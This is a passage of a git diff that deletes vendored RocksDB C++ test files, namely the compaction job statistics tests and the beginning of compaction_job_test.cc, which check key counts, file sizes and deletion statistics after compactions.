-  Status Delete(int cf, const std::string& k) {
-    return db_->Delete(WriteOptions(), handles_[cf], k);
-  }
-
-  std::string Get(const std::string& k, const Snapshot* snapshot = nullptr) {
-    ReadOptions options;
-    options.verify_checksums = true;
-    options.snapshot = snapshot;
-    std::string result;
-    Status s = db_->Get(options, k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-  std::string Get(int cf, const std::string& k,
-                  const Snapshot* snapshot = nullptr) {
-    ReadOptions options;
-    options.verify_checksums = true;
-    options.snapshot = snapshot;
-    std::string result;
-    Status s = db_->Get(options, handles_[cf], k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-  int NumTableFilesAtLevel(int level, int cf = 0) {
-    std::string property;
-    if (cf == 0) {
-      // default cfd
-      EXPECT_TRUE(db_->GetProperty(
-          "rocksdb.num-files-at-level" + NumberToString(level), &property));
-    } else {
-      EXPECT_TRUE(db_->GetProperty(
-          handles_[cf], "rocksdb.num-files-at-level" + NumberToString(level),
-          &property));
-    }
-    return atoi(property.c_str());
-  }
-
-  // Return spread of files per level
-  std::string FilesPerLevel(int cf = 0) {
-    int num_levels =
-        (cf == 0) ? db_->NumberLevels() : db_->NumberLevels(handles_[1]);
-    std::string result;
-    size_t last_non_zero_offset = 0;
-    for (int level = 0; level < num_levels; level++) {
-      int f = NumTableFilesAtLevel(level, cf);
-      char buf[100];
-      snprintf(buf, sizeof(buf), "%s%d", (level ? "," : ""), f);
-      result += buf;
-      if (f > 0) {
-        last_non_zero_offset = result.size();
-      }
-    }
-    result.resize(last_non_zero_offset);
-    return result;
-  }
-
-  uint64_t Size(const Slice& start, const Slice& limit, int cf = 0) {
-    Range r(start, limit);
-    uint64_t size;
-    if (cf == 0) {
-      db_->GetApproximateSizes(&r, 1, &size);
-    } else {
-      db_->GetApproximateSizes(handles_[1], &r, 1, &size);
-    }
-    return size;
-  }
-
-  void Compact(int cf, const Slice& start, const Slice& limit,
-               uint32_t target_path_id) {
-    CompactRangeOptions compact_options;
-    compact_options.target_path_id = target_path_id;
-    ASSERT_OK(db_->CompactRange(compact_options, handles_[cf], &start, &limit));
-  }
-
-  void Compact(int cf, const Slice& start, const Slice& limit) {
-    ASSERT_OK(
-        db_->CompactRange(CompactRangeOptions(), handles_[cf], &start, &limit));
-  }
-
-  void Compact(const Slice& start, const Slice& limit) {
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), &start, &limit));
-  }
-
-  void TEST_Compact(int level, int cf, const Slice& start, const Slice& limit) {
-    ASSERT_OK(dbfull()->TEST_CompactRange(level, &start, &limit, handles_[cf],
-                                          true /* disallow trivial move */));
-  }
-
-  // Do n memtable compactions, each of which produces an sstable
-  // covering the range [small,large].
-  void MakeTables(int n, const std::string& small, const std::string& large,
-                  int cf = 0) {
-    for (int i = 0; i < n; i++) {
-      ASSERT_OK(Put(cf, small, "begin"));
-      ASSERT_OK(Put(cf, large, "end"));
-      ASSERT_OK(Flush(cf));
-    }
-  }
-
-  static void SetDeletionCompactionStats(
-      CompactionJobStats *stats, uint64_t input_deletions,
-      uint64_t expired_deletions, uint64_t records_replaced) {
-    stats->num_input_deletion_records = input_deletions;
-    stats->num_expired_deletion_records = expired_deletions;
-    stats->num_records_replaced = records_replaced;
-  }
-
-  void MakeTableWithKeyValues(
-    Random* rnd, uint64_t smallest, uint64_t largest,
-    int key_size, int value_size, uint64_t interval,
-    double ratio, int cf = 0) {
-    for (auto key = smallest; key < largest; key += interval) {
-      ASSERT_OK(Put(cf, Slice(Key(key, key_size)),
-                        Slice(RandomString(rnd, value_size, ratio))));
-    }
-    ASSERT_OK(Flush(cf));
-  }
-
-  // This function behaves with the implicit understanding that two
-  // rounds of keys are inserted into the database, as per the behavior
-  // of the DeletionStatsTest.
-  void SelectivelyDeleteKeys(uint64_t smallest, uint64_t largest,
-    uint64_t interval, int deletion_interval, int key_size,
-    uint64_t cutoff_key_num, CompactionJobStats* stats, int cf = 0) {
-
-    // interval needs to be >= 2 so that deletion entries can be inserted
-    // that are intended to not result in an actual key deletion by using
-    // an offset of 1 from another existing key
-    ASSERT_GE(interval, 2);
-
-    uint64_t ctr = 1;
-    uint32_t deletions_made = 0;
-    uint32_t num_deleted = 0;
-    uint32_t num_expired = 0;
-    for (auto key = smallest; key <= largest; key += interval, ctr++) {
-      if (ctr % deletion_interval == 0) {
-        ASSERT_OK(Delete(cf, Key(key, key_size)));
-        deletions_made++;
-        num_deleted++;
-
-        if (key > cutoff_key_num) {
-          num_expired++;
-        }
-      }
-    }
-
-    // Insert some deletions for keys that don't exist that
-    // are both in and out of the key range
-    ASSERT_OK(Delete(cf, Key(smallest+1, key_size)));
-    deletions_made++;
-
-    ASSERT_OK(Delete(cf, Key(smallest-1, key_size)));
-    deletions_made++;
-    num_expired++;
-
-    ASSERT_OK(Delete(cf, Key(smallest-9, key_size)));
-    deletions_made++;
-    num_expired++;
-
-    ASSERT_OK(Flush(cf));
-    SetDeletionCompactionStats(stats, deletions_made, num_expired,
-      num_deleted);
-  }
-};
-
-// An EventListener which helps verify the compaction results in
-// test CompactionJobStatsTest.
-class CompactionJobStatsChecker : public EventListener {
- public:
-  CompactionJobStatsChecker()
-      : compression_enabled_(false), verify_next_comp_io_stats_(false) {}
-
-  size_t NumberOfUnverifiedStats() { return expected_stats_.size(); }
-
-  void set_verify_next_comp_io_stats(bool v) { verify_next_comp_io_stats_ = v; }
-
-  // Once a compaction completed, this function will verify the returned
-  // CompactionJobInfo with the oldest CompactionJobInfo added earlier
-  // in "expected_stats_" which has not yet being used for verification.
-  virtual void OnCompactionCompleted(DB *db, const CompactionJobInfo& ci) {
-    if (verify_next_comp_io_stats_) {
-      ASSERT_GT(ci.stats.file_write_nanos, 0);
-      ASSERT_GT(ci.stats.file_range_sync_nanos, 0);
-      ASSERT_GT(ci.stats.file_fsync_nanos, 0);
-      ASSERT_GT(ci.stats.file_prepare_write_nanos, 0);
-      verify_next_comp_io_stats_ = false;
-    }
-
-    std::lock_guard<std::mutex> lock(mutex_);
-    if (expected_stats_.size()) {
-      Verify(ci.stats, expected_stats_.front());
-      expected_stats_.pop();
-    }
-  }
-
-  // A helper function which verifies whether two CompactionJobStats
-  // match.  The verification of all compaction stats are done by
-  // ASSERT_EQ except for the total input / output bytes, which we
-  // use ASSERT_GE and ASSERT_LE with a reasonable bias ---
-  // 10% in uncompressed case and 20% when compression is used.
-  virtual void Verify(const CompactionJobStats& current_stats,
-              const CompactionJobStats& stats) {
-    // time
-    ASSERT_GT(current_stats.elapsed_micros, 0U);
-
-    ASSERT_EQ(current_stats.num_input_records,
-        stats.num_input_records);
-    ASSERT_EQ(current_stats.num_input_files,
-        stats.num_input_files);
-    ASSERT_EQ(current_stats.num_input_files_at_output_level,
-        stats.num_input_files_at_output_level);
-
-    ASSERT_EQ(current_stats.num_output_records,
-        stats.num_output_records);
-    ASSERT_EQ(current_stats.num_output_files,
-        stats.num_output_files);
-
-    ASSERT_EQ(current_stats.is_manual_compaction,
-        stats.is_manual_compaction);
-
-    // file size
-    double kFileSizeBias = compression_enabled_ ? 0.20 : 0.10;
-    ASSERT_GE(current_stats.total_input_bytes * (1.00 + kFileSizeBias),
-              stats.total_input_bytes);
-    ASSERT_LE(current_stats.total_input_bytes,
-              stats.total_input_bytes * (1.00 + kFileSizeBias));
-    ASSERT_GE(current_stats.total_output_bytes * (1.00 + kFileSizeBias),
-              stats.total_output_bytes);
-    ASSERT_LE(current_stats.total_output_bytes,
-              stats.total_output_bytes * (1.00 + kFileSizeBias));
-    ASSERT_EQ(current_stats.total_input_raw_key_bytes,
-              stats.total_input_raw_key_bytes);
-    ASSERT_EQ(current_stats.total_input_raw_value_bytes,
-              stats.total_input_raw_value_bytes);
-
-    ASSERT_EQ(current_stats.num_records_replaced,
-        stats.num_records_replaced);
-
-    ASSERT_EQ(current_stats.num_corrupt_keys,
-        stats.num_corrupt_keys);
-
-    ASSERT_EQ(
-        std::string(current_stats.smallest_output_key_prefix),
-        std::string(stats.smallest_output_key_prefix));
-    ASSERT_EQ(
-        std::string(current_stats.largest_output_key_prefix),
-        std::string(stats.largest_output_key_prefix));
-  }
-
-  // Add an expected compaction stats, which will be used to
-  // verify the CompactionJobStats returned by the OnCompactionCompleted()
-  // callback.
-  void AddExpectedStats(const CompactionJobStats& stats) {
-    std::lock_guard<std::mutex> lock(mutex_);
-    expected_stats_.push(stats);
-  }
-
-  void EnableCompression(bool flag) {
-    compression_enabled_ = flag;
-  }
-
-  bool verify_next_comp_io_stats() const { return verify_next_comp_io_stats_; }
-
- private:
-  std::mutex mutex_;
-  std::queue<CompactionJobStats> expected_stats_;
-  bool compression_enabled_;
-  bool verify_next_comp_io_stats_;
-};
-
-// An EventListener which helps verify the compaction statistics in
-// the test DeletionStatsTest.
-class CompactionJobDeletionStatsChecker : public CompactionJobStatsChecker {
- public:
-  // Verifies whether two CompactionJobStats match.
-  void Verify(const CompactionJobStats& current_stats,
-              const CompactionJobStats& stats) {
-    ASSERT_EQ(
-      current_stats.num_input_deletion_records,
-      stats.num_input_deletion_records);
-    ASSERT_EQ(
-        current_stats.num_expired_deletion_records,
-        stats.num_expired_deletion_records);
-    ASSERT_EQ(
-        current_stats.num_records_replaced,
-        stats.num_records_replaced);
-
-    ASSERT_EQ(current_stats.num_corrupt_keys,
-        stats.num_corrupt_keys);
-  }
-};
-
-namespace {
-
-uint64_t EstimatedFileSize(
-    uint64_t num_records, size_t key_size, size_t value_size,
-    double compression_ratio = 1.0,
-    size_t block_size = 4096,
-    int bloom_bits_per_key = 10) {
-  const size_t kPerKeyOverhead = 8;
-  const size_t kFooterSize = 512;
-
-  uint64_t data_size =
-    static_cast<uint64_t>(
-      num_records * (key_size + value_size * compression_ratio +
-                     kPerKeyOverhead));
-
-  return data_size + kFooterSize
-         + num_records * bloom_bits_per_key / 8      // filter block
-         + data_size * (key_size + 8) / block_size;  // index block
-}
-
-namespace {
-
-void CopyPrefix(
-    const Slice& src, size_t prefix_length, std::string* dst) {
-  assert(prefix_length > 0);
-  size_t length = src.size() > prefix_length ? prefix_length : src.size();
-  dst->assign(src.data(), length);
-}
-
-}  // namespace
-
-CompactionJobStats NewManualCompactionJobStats(
-    const std::string& smallest_key, const std::string& largest_key,
-    size_t num_input_files, size_t num_input_files_at_output_level,
-    uint64_t num_input_records, size_t key_size, size_t value_size,
-    size_t num_output_files, uint64_t num_output_records,
-    double compression_ratio, uint64_t num_records_replaced,
-    bool is_manual = true) {
-  CompactionJobStats stats;
-  stats.Reset();
-
-  stats.num_input_records = num_input_records;
-  stats.num_input_files = num_input_files;
-  stats.num_input_files_at_output_level = num_input_files_at_output_level;
-
-  stats.num_output_records = num_output_records;
-  stats.num_output_files = num_output_files;
-
-  stats.total_input_bytes =
-      EstimatedFileSize(
-          num_input_records / num_input_files,
-          key_size, value_size, compression_ratio) * num_input_files;
-  stats.total_output_bytes =
-      EstimatedFileSize(
-          num_output_records / num_output_files,
-          key_size, value_size, compression_ratio) * num_output_files;
-  stats.total_input_raw_key_bytes =
-      num_input_records * (key_size + 8);
-  stats.total_input_raw_value_bytes =
-      num_input_records * value_size;
-
-  stats.is_manual_compaction = is_manual;
-
-  stats.num_records_replaced = num_records_replaced;
-
-  CopyPrefix(smallest_key,
-             CompactionJobStats::kMaxPrefixLength,
-             &stats.smallest_output_key_prefix);
-  CopyPrefix(largest_key,
-             CompactionJobStats::kMaxPrefixLength,
-             &stats.largest_output_key_prefix);
-
-  return stats;
-}
-
-CompressionType GetAnyCompression() {
-  if (Snappy_Supported()) {
-    return kSnappyCompression;
-  } else if (Zlib_Supported()) {
-    return kZlibCompression;
-  } else if (BZip2_Supported()) {
-    return kBZip2Compression;
-  } else if (LZ4_Supported()) {
-    return kLZ4Compression;
-  } else if (XPRESS_Supported()) {
-    return kXpressCompression;
-  }
-
-  return kNoCompression;
-}
-
-}  // namespace
-
-TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) {
-  Random rnd(301);
-  const int kBufSize = 100;
-  char buf[kBufSize];
-  uint64_t key_base = 100000000l;
-  // Note: key_base must be multiple of num_keys_per_L0_file
-  int num_keys_per_L0_file = 100;
-  const int kTestScale = 8;
-  const int kKeySize = 10;
-  const int kValueSize = 1000;
-  const double kCompressionRatio = 0.5;
-  double compression_ratio = 1.0;
-  uint64_t key_interval = key_base / num_keys_per_L0_file;
-
-  // Whenever a compaction completes, this listener will try to
-  // verify whether the returned CompactionJobStats matches
-  // what we expect.  The expected CompactionJobStats is added
-  // via AddExpectedStats().
-  auto* stats_checker = new CompactionJobStatsChecker();
-  Options options;
-  options.listeners.emplace_back(stats_checker);
-  options.create_if_missing = true;
-  // just enough setting to hold off auto-compaction.
-  options.level0_file_num_compaction_trigger = kTestScale + 1;
-  options.num_levels = 3;
-  options.compression = kNoCompression;
-  options.max_subcompactions = max_subcompactions_;
-  options.bytes_per_sync = 512 * 1024;
-
-  options.report_bg_io_stats = true;
-  for (int test = 0; test < 2; ++test) {
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // 1st Phase: generate "num_L0_files" L0 files.
-    int num_L0_files = 0;
-    for (uint64_t start_key = key_base;
-                  start_key <= key_base * kTestScale;
-                  start_key += key_base) {
-      MakeTableWithKeyValues(
-          &rnd, start_key, start_key + key_base - 1,
-          kKeySize, kValueSize, key_interval,
-          compression_ratio, 1);
-      snprintf(buf, kBufSize, "%d", ++num_L0_files);
-      ASSERT_EQ(std::string(buf), FilesPerLevel(1));
-    }
-    ASSERT_EQ(ToString(num_L0_files), FilesPerLevel(1));
-
-    // 2nd Phase: perform L0 -> L1 compaction.
-    int L0_compaction_count = 6;
-    int count = 1;
-    std::string smallest_key;
-    std::string largest_key;
-    for (uint64_t start_key = key_base;
-         start_key <= key_base * L0_compaction_count;
-         start_key += key_base, count++) {
-      smallest_key = Key(start_key, 10);
-      largest_key = Key(start_key + key_base - key_interval, 10);
-      stats_checker->AddExpectedStats(
-          NewManualCompactionJobStats(
-              smallest_key, largest_key,
-              1, 0, num_keys_per_L0_file,
-              kKeySize, kValueSize,
-              1, num_keys_per_L0_file,
-              compression_ratio, 0));
-      ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 1U);
-      TEST_Compact(0, 1, smallest_key, largest_key);
-      snprintf(buf, kBufSize, "%d,%d", num_L0_files - count, count);
-      ASSERT_EQ(std::string(buf), FilesPerLevel(1));
-    }
-
-    // compact two files into one in the last L0 -> L1 compaction
-    int num_remaining_L0 = num_L0_files - L0_compaction_count;
-    smallest_key = Key(key_base * (L0_compaction_count + 1), 10);
-    largest_key = Key(key_base * (kTestScale + 1) - key_interval, 10);
-    stats_checker->AddExpectedStats(
-        NewManualCompactionJobStats(
-            smallest_key, largest_key,
-            num_remaining_L0,
-            0, num_keys_per_L0_file * num_remaining_L0,
-            kKeySize, kValueSize,
-            1, num_keys_per_L0_file * num_remaining_L0,
-            compression_ratio, 0));
-    ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 1U);
-    TEST_Compact(0, 1, smallest_key, largest_key);
-
-    int num_L1_files = num_L0_files - num_remaining_L0 + 1;
-    num_L0_files = 0;
-    snprintf(buf, kBufSize, "%d,%d", num_L0_files, num_L1_files);
-    ASSERT_EQ(std::string(buf), FilesPerLevel(1));
-
-    // 3rd Phase: generate sparse L0 files (wider key-range, same num of keys)
-    int sparseness = 2;
-    for (uint64_t start_key = key_base;
-                  start_key <= key_base * kTestScale;
-                  start_key += key_base * sparseness) {
-      MakeTableWithKeyValues(
-          &rnd, start_key, start_key + key_base * sparseness - 1,
-          kKeySize, kValueSize,
-          key_base * sparseness / num_keys_per_L0_file,
-          compression_ratio, 1);
-      snprintf(buf, kBufSize, "%d,%d", ++num_L0_files, num_L1_files);
-      ASSERT_EQ(std::string(buf), FilesPerLevel(1));
-    }
-
-    // 4th Phase: perform L0 -> L1 compaction again, expect higher write amp
-    // When subcompactions are enabled, the number of output files increases
-    // by 1 because multiple threads are consuming the input and generating
-    // output files without coordinating to see if the output could fit into
-    // a smaller number of files like it does when it runs sequentially
-    int num_output_files = options.max_subcompactions > 1 ? 2 : 1;
-    for (uint64_t start_key = key_base;
-         num_L0_files > 1;
-         start_key += key_base * sparseness) {
-      smallest_key = Key(start_key, 10);
-      largest_key =
-          Key(start_key + key_base * sparseness - key_interval, 10);
-      stats_checker->AddExpectedStats(
-          NewManualCompactionJobStats(
-              smallest_key, largest_key,
-              3, 2, num_keys_per_L0_file * 3,
-              kKeySize, kValueSize,
-              num_output_files,
-              num_keys_per_L0_file * 2,  // 1/3 of the data will be updated.
-              compression_ratio,
-              num_keys_per_L0_file));
-      ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 1U);
-      Compact(1, smallest_key, largest_key);
-      if (options.max_subcompactions == 1) {
-        --num_L1_files;
-      }
-      snprintf(buf, kBufSize, "%d,%d", --num_L0_files, num_L1_files);
-      ASSERT_EQ(std::string(buf), FilesPerLevel(1));
-    }
-
-    // 5th Phase: Do a full compaction, which involves in two sub-compactions.
-    // Here we expect to have 1 L0 files and 4 L1 files
-    // In the first sub-compaction, we expect L0 compaction.
-    smallest_key = Key(key_base, 10);
-    largest_key = Key(key_base * (kTestScale + 1) - key_interval, 10);
-    stats_checker->AddExpectedStats(
-        NewManualCompactionJobStats(
-            Key(key_base * (kTestScale + 1 - sparseness), 10), largest_key,
-            2, 1, num_keys_per_L0_file * 3,
-            kKeySize, kValueSize,
-            1, num_keys_per_L0_file * 2,
-            compression_ratio,
-            num_keys_per_L0_file));
-    ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 1U);
-    Compact(1, smallest_key, largest_key);
-
-    num_L1_files = options.max_subcompactions > 1 ? 7 : 4;
-    char L1_buf[4];
-    snprintf(L1_buf, sizeof(L1_buf), "0,%d", num_L1_files);
-    std::string L1_files(L1_buf);
-    ASSERT_EQ(L1_files, FilesPerLevel(1));
-    options.compression = GetAnyCompression();
-    if (options.compression == kNoCompression) {
-      break;
-    }
-    stats_checker->EnableCompression(true);
-    compression_ratio = kCompressionRatio;
-
-    for (int i = 0; i < 5; i++) {
-      ASSERT_OK(Put(1, Slice(Key(key_base + i, 10)),
-                    Slice(RandomString(&rnd, 512 * 1024, 1))));
-    }
-
-    ASSERT_OK(Flush(1));
-    reinterpret_cast<DBImpl*>(db_)->TEST_WaitForCompact();
-
-    stats_checker->set_verify_next_comp_io_stats(true);
-    std::atomic<bool> first_prepare_write(true);
-    rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "WritableFileWriter::Append:BeforePrepareWrite", [&](void* arg) {
-          if (first_prepare_write.load()) {
-            options.env->SleepForMicroseconds(3);
-            first_prepare_write.store(false);
-          }
-        });
-
-    std::atomic<bool> first_flush(true);
-    rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "WritableFileWriter::Flush:BeforeAppend", [&](void* arg) {
-          if (first_flush.load()) {
-            options.env->SleepForMicroseconds(3);
-            first_flush.store(false);
-          }
-        });
-
-    std::atomic<bool> first_sync(true);
-    rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "WritableFileWriter::SyncInternal:0", [&](void* arg) {
-          if (first_sync.load()) {
-            options.env->SleepForMicroseconds(3);
-            first_sync.store(false);
-          }
-        });
-
-    std::atomic<bool> first_range_sync(true);
-    rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "WritableFileWriter::RangeSync:0", [&](void* arg) {
-          if (first_range_sync.load()) {
-            options.env->SleepForMicroseconds(3);
-            first_range_sync.store(false);
-          }
-        });
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    Compact(1, smallest_key, largest_key);
-
-    ASSERT_TRUE(!stats_checker->verify_next_comp_io_stats());
-    ASSERT_TRUE(!first_prepare_write.load());
-    ASSERT_TRUE(!first_flush.load());
-    ASSERT_TRUE(!first_sync.load());
-    ASSERT_TRUE(!first_range_sync.load());
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-  ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 0U);
-}
-
-TEST_P(CompactionJobStatsTest, DeletionStatsTest) {
-  Random rnd(301);
-  uint64_t key_base = 100000l;
-  // Note: key_base must be multiple of num_keys_per_L0_file
-  int num_keys_per_L0_file = 20;
-  const int kTestScale = 8;  // make sure this is even
-  const int kKeySize = 10;
-  const int kValueSize = 100;
-  double compression_ratio = 1.0;
-  uint64_t key_interval = key_base / num_keys_per_L0_file;
-  uint64_t largest_key_num = key_base * (kTestScale + 1) - key_interval;
-  uint64_t cutoff_key_num = key_base * (kTestScale / 2 + 1) - key_interval;
-  const std::string smallest_key = Key(key_base - 10, kKeySize);
-  const std::string largest_key = Key(largest_key_num + 10, kKeySize);
-
-  // Whenever a compaction completes, this listener will try to
-  // verify whether the returned CompactionJobStats matches
-  // what we expect.
-  auto* stats_checker = new CompactionJobDeletionStatsChecker();
-  Options options;
-  options.listeners.emplace_back(stats_checker);
-  options.create_if_missing = true;
-  options.level0_file_num_compaction_trigger = kTestScale+1;
-  options.num_levels = 3;
-  options.compression = kNoCompression;
-  options.max_bytes_for_level_multiplier = 2;
-  options.max_subcompactions = max_subcompactions_;
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Stage 1: Generate several L0 files and then send them to L2 by
-  // using CompactRangeOptions and CompactRange(). These files will
-  // have a strict subset of the keys from the full key-range
-  for (uint64_t start_key = key_base;
-                start_key <= key_base * kTestScale / 2;
-                start_key += key_base) {
-    MakeTableWithKeyValues(
-        &rnd, start_key, start_key + key_base - 1,
-        kKeySize, kValueSize, key_interval,
-        compression_ratio, 1);
-  }
-
-  CompactRangeOptions cr_options;
-  cr_options.change_level = true;
-  cr_options.target_level = 2;
-  db_->CompactRange(cr_options, handles_[1], nullptr, nullptr);
-  ASSERT_GT(NumTableFilesAtLevel(2, 1), 0);
-
-  // Stage 2: Generate files including keys from the entire key range
-  for (uint64_t start_key = key_base;
-                start_key <= key_base * kTestScale;
-                start_key += key_base) {
-    MakeTableWithKeyValues(
-        &rnd, start_key, start_key + key_base - 1,
-        kKeySize, kValueSize, key_interval,
-        compression_ratio, 1);
-  }
-
-  // Send these L0 files to L1
-  TEST_Compact(0, 1, smallest_key, largest_key);
-  ASSERT_GT(NumTableFilesAtLevel(1, 1), 0);
-
-  // Add a new record and flush so now there is a L0 file
-  // with a value too (not just deletions from the next step)
-  ASSERT_OK(Put(1, Key(key_base-6, kKeySize), "test"));
-  ASSERT_OK(Flush(1));
-
-  // Stage 3: Generate L0 files with some deletions so now
-  // there are files with the same key range in L0, L1, and L2
-  int deletion_interval = 3;
-  CompactionJobStats first_compaction_stats;
-  SelectivelyDeleteKeys(key_base, largest_key_num,
-      key_interval, deletion_interval, kKeySize, cutoff_key_num,
-      &first_compaction_stats, 1);
-
-  stats_checker->AddExpectedStats(first_compaction_stats);
-
-  // Stage 4: Trigger compaction and verify the stats
-  TEST_Compact(0, 1, smallest_key, largest_key);
-}
-
-namespace {
-int GetUniversalCompactionInputUnits(uint32_t num_flushes) {
-  uint32_t compaction_input_units;
-  for (compaction_input_units = 1;
-       num_flushes >= compaction_input_units;
-       compaction_input_units *= 2) {
-    if ((num_flushes & compaction_input_units) != 0) {
-      return compaction_input_units > 1 ? compaction_input_units : 0;
-    }
-  }
-  return 0;
-}
-}  // namespace
-
-TEST_P(CompactionJobStatsTest, UniversalCompactionTest) {
-  Random rnd(301);
-  uint64_t key_base = 100000000l;
-  // Note: key_base must be multiple of num_keys_per_L0_file
-  int num_keys_per_table = 100;
-  const uint32_t kTestScale = 6;
-  const int kKeySize = 10;
-  const int kValueSize = 900;
-  double compression_ratio = 1.0;
-  uint64_t key_interval = key_base / num_keys_per_table;
-
-  auto* stats_checker = new CompactionJobStatsChecker();
-  Options options;
-  options.listeners.emplace_back(stats_checker);
-  options.create_if_missing = true;
-  options.num_levels = 3;
-  options.compression = kNoCompression;
-  options.level0_file_num_compaction_trigger = 2;
-  options.target_file_size_base = num_keys_per_table * 1000;
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.size_ratio = 1;
-  options.compaction_options_universal.max_size_amplification_percent = 1000;
-  options.max_subcompactions = max_subcompactions_;
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Generates the expected CompactionJobStats for each compaction
-  for (uint32_t num_flushes = 2; num_flushes <= kTestScale; num_flushes++) {
-    // Here we treat one newly flushed file as an unit.
-    //
-    // For example, if a newly flushed file is 100k, and a compaction has
-    // 4 input units, then this compaction inputs 400k.
-    uint32_t num_input_units = GetUniversalCompactionInputUnits(num_flushes);
-    if (num_input_units == 0) {
-      continue;
-    }
-    // The following statement determines the expected smallest key
-    // based on whether it is a full compaction.  A full compaction only
-    // happens when the number of flushes equals to the number of compaction
-    // input runs.
-    uint64_t smallest_key =
-        (num_flushes == num_input_units) ?
-            key_base : key_base * (num_flushes - 1);
-
-    stats_checker->AddExpectedStats(
-        NewManualCompactionJobStats(
-            Key(smallest_key, 10),
-            Key(smallest_key + key_base * num_input_units - key_interval, 10),
-            num_input_units,
-            num_input_units > 2 ? num_input_units / 2 : 0,
-            num_keys_per_table * num_input_units,
-            kKeySize, kValueSize,
-            num_input_units,
-            num_keys_per_table * num_input_units,
-            1.0, 0, false));
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 3U);
-
-  for (uint64_t start_key = key_base;
-                start_key <= key_base * kTestScale;
-                start_key += key_base) {
-    MakeTableWithKeyValues(
-        &rnd, start_key, start_key + key_base - 1,
-        kKeySize, kValueSize, key_interval,
-        compression_ratio, 1);
-    reinterpret_cast<DBImpl*>(db_)->TEST_WaitForCompact();
-  }
-  ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 0U);
-}
-
-INSTANTIATE_TEST_CASE_P(CompactionJobStatsTest, CompactionJobStatsTest,
-                        ::testing::Values(1, 4));
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED, not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
-
-#else
-
-int main(int argc, char** argv) { return 0; }
-#endif  // !defined(IOS_CROSS_COMPILE)
diff --git a/thirdparty/rocksdb/db/compaction_job_test.cc b/thirdparty/rocksdb/db/compaction_job_test.cc
deleted file mode 100644
index cace181..0000000
--- a/thirdparty/rocksdb/db/compaction_job_test.cc
+++ /dev/null
@@ -1,949 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <map>
-#include <string>
-#include <tuple>
-
-#include "db/column_family.h"
-#include "db/compaction_job.h"
-#include "db/version_set.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/mock_table.h"
-#include "util/file_reader_writer.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-namespace {
-
-void VerifyInitializationOfCompactionJobStats(
-      const CompactionJobStats& compaction_job_stats) {
-#if !defined(IOS_CROSS_COMPILE)
-  ASSERT_EQ(compaction_job_stats.elapsed_micros, 0U);
-
-  ASSERT_EQ(compaction_job_stats.num_input_records, 0U);
-  ASSERT_EQ(compaction_job_stats.num_input_files, 0U);
-  ASSERT_EQ(compaction_job_stats.num_input_files_at_output_level, 0U);
-
-  ASSERT_EQ(compaction_job_stats.num_output_records, 0U);
-  ASSERT_EQ(compaction_job_stats.num_output_files, 0U);
-
-  ASSERT_EQ(compaction_job_stats.is_manual_compaction, true);
-
-  ASSERT_EQ(compaction_job_stats.total_input_bytes, 0U);
-  ASSERT_EQ(compaction_job_stats.total_output_bytes, 0U);
-
-  ASSERT_EQ(compaction_job_stats.total_input_raw_key_bytes, 0U);
-  ASSERT_EQ(compaction_job_stats.total_input_raw_value_bytes, 0U);
-
-  ASSERT_EQ(compaction_job_stats.smallest_output_key_prefix[0], 0);
-  ASSERT_EQ(compaction_job_stats.largest_output_key_prefix[0], 0);
-
-  ASSERT_EQ(compaction_job_stats.num_records_replaced, 0U);
-
-  ASSERT_EQ(compaction_job_stats.num_input_deletion_records, 0U);
-  ASSERT_EQ(compaction_job_stats.num_expired_deletion_records, 0U);
-
-  ASSERT_EQ(compaction_job_stats.num_corrupt_keys, 0U);
-#endif  // !defined(IOS_CROSS_COMPILE)
-}
-
-}  // namespace
-
-// TODO(icanadi) Make it simpler once we mock out VersionSet
-class CompactionJobTest : public testing::Test {
- public:
-  CompactionJobTest()
-      : env_(Env::Default()),
-        dbname_(test::TmpDir() + "/compaction_job_test"),
-        db_options_(),
-        mutable_cf_options_(cf_options_),
-        table_cache_(NewLRUCache(50000, 16)),
-        write_buffer_manager_(db_options_.db_write_buffer_size),
-        versions_(new VersionSet(dbname_, &db_options_, env_options_,
-                                 table_cache_.get(), &write_buffer_manager_,
-                                 &write_controller_)),
-        shutting_down_(false),
-        mock_table_factory_(new mock::MockTableFactory()) {
